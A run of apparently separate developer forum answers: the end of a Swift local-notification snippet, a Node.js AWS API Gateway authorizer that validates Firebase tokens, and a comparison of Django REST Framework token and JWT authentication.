notificationIncomingCall.fireDate = NSDate(timeIntervalSinceNow: 1) notificationIncomingCall.alertBody = strTitle notificationIncomingCall.alertAction = "Open" notificationIncomingCall.soundName = "SoundFile.mp3" notificationIncomingCall.category = dict["category"] as? String ?? "" //"As per payload you receive" notificationIncomingCall.userInfo = ["key1": "Value1" ,"key2": "Value2" ] UIApplication.sharedApplication().scheduleLocalNotification(notificationIncomingCall) } else { // something else } } } } //MARK: - Local Notification Methods func application(application: UIApplication, didReceiveLocalNotification notification: UILocalNotification){ // Your interactive local notification events will be called at this place } }
We are doing the same. We started with Cognito but moved to Firebase because we were not satisfied with the way AWS Android SDK implements the authentication flow with Google and Facebook: the code is quite old, it makes use of deprecated methods and generally requires rewriting. On the other hand, Firebase authentication is obviously working seamlessly. When you don't use Cognito, you need to implement your custom authenticator in AWS API Gateway which is quite easy and is described in https://aws.amazon.com/blogs/mobile/integrating-amazon-cognito-user-pools-with-api-gateway/. Firebase instructions for token validation are in https://firebase.google.com/docs/auth/admin/verify-id-tokens The following is an excerpt of my authenticator's code: 'use strict'; // Firebase initialization // console.log('Loading function'); const admin = require("firebase-admin"); admin.initializeApp({ credential: admin.credential.cert("xxx.json"), databaseURL: "https://xxx.firebaseio.com" }); // Standard AWS AuthPolicy - don't touch !! ... // END Standard AWS AuthPolicy - don't touch !! exports.handler = (event, context, callback) => { // console.log('Client token:', event.authorizationToken); // console.log('Method ARN:', event.methodArn); // validate the incoming token // and produce the principal user identifier associated with the token // this is accomplished by Firebase Admin admin.auth().verifyIdToken(event.authorizationToken) .then(function(decodedToken) { let principalId = decodedToken.uid; // console.log(JSON.stringify(decodedToken)); // if the token is valid, a policy must be generated which will allow or deny access to the client // if access is denied, the client will recieve a 403 Access Denied response // if access is allowed, API Gateway will proceed with the backend integration configured on the method that was called // build apiOptions for the AuthPolicy const apiOptions = {}; const tmp = event.methodArn.split(':'); const apiGatewayArnTmp = tmp[5].split('/'); const awsAccountId = tmp[4]; apiOptions.region = tmp[3]; apiOptions.restApiId = apiGatewayArnTmp[0]; apiOptions.stage = apiGatewayArnTmp[1]; const method = apiGatewayArnTmp[2]; let resource = '/'; // root resource if (apiGatewayArnTmp[3]) { resource += apiGatewayArnTmp[3]; } // this function must generate a policy that is associated with the recognized principal user identifier. // depending on your use case, you might store policies in a DB, or generate them on the fly // keep in mind, the policy is cached for 5 minutes by default (TTL is configurable in the authorizer) // and will apply to subsequent calls to any method/resource in the RestApi // made with the same token // the policy below grants access to all resources in the RestApi const policy = new AuthPolicy(principalId, awsAccountId, apiOptions); policy.allowAllMethods(); // policy.denyAllMethods(); // policy.allowMethod(AuthPolicy.HttpVerb.GET, "/users/username"); // finally, build the policy and exit the function callback(null, policy.build()); }) .catch(function(error) { // Firebase throws an error when the token is not valid // you can send a 401 Unauthorized response to the client by failing like so: console.error(error); callback("Unauthorized"); }); }; We are not in production, yet, but tests on the authenticator show that it behaves correctly with Google, Facebook and password authentication and it is also very quick (60 - 200 ms). The only drawback I can see is that you will be charged for the authenticator lambda function, while the Cognito integrated authenticator is free. Update after almost 1yr I moved away from API Gateway custom authenticator, mainly because I've not been able to automate its deployment with cloudformation scripts. My solution is now to have authentication directly within the API caching tokens for some time, like the Authenticator does, so to avoid excessive validations.
They both carrying out similar tasks with few differences. Token DRF's builtin Token Authentication One Token for all sessions No time stamp on the token DRF JWT Token Authentication One Token per session Expiry timestamp on each token Database access DRF's builtin Token Authentication Database access to fetch the user associated with the token Verify user's status Authenticate the user DRF JWT Token Authentication Decode token (get payload) Verify token timestamp (expiry) Database access to fetch user associated with the id in the payload Verify user's status Authenticate the user Pros DRF's builtin Token Authentication Allows forced-logout by replacing the token in the database (ex: password change) DRF JWT Token Authentication Token with an expiration time No database hit unless the token is valid Cons DRF's builtin Token Authentication Database hit on all requests Single token for all sessions DRF JWT Token Authentication Unable to recall the token without tracking it in the database Once the token is issued, anyone with the token can make requests Specs are open to interpretations, no consensus on how to do refresh